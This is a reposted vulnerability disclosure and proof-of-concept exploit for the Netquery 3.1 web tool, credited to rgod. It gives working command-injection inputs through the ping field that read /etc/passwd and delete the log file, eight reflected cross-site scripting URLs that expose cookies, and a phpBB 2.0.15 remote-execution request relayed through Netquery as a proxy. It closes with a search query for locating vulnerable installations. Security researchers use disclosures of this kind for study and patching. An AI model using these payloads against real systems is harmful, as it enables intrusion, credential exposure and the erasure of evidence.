[转载]Netquery 3.1远程命令执行 跨站脚本 信息泄露漏洞

文章作者：rgod[at]autistici.org

Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit

software:
author site: http://www.virtech.org/tools/

a user can execute commands on target system by PING panel, if enabled like often happens, using pipe char on
"Ping IP Address or Host Name" input text box, example:

| cat /etc/passwd

then you will see plain text password file

| pwd

to see current path

| rm [pwd_output]/logs/nq_log.txt

to delete log file...

disclosure of user activity:
if enabled, a user can view clear text log file through url:

http://[target]/[path]/logs/nq_log.txt

xss:
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>


a user can use on-line Netquery installations like  proxy servers
to launch exploit from HTTP GET request panel, example:
exploiting Phpbb 2.0.15:
make a get request of
http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight=&#39;.system($HTTP_GET_VARS[command]).&#39;&command=cat%20/etc/passwd

googledork: inurl:nquser.php


rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org

exp:
http://www.eviloctal.com/forum/read.php?tid=12775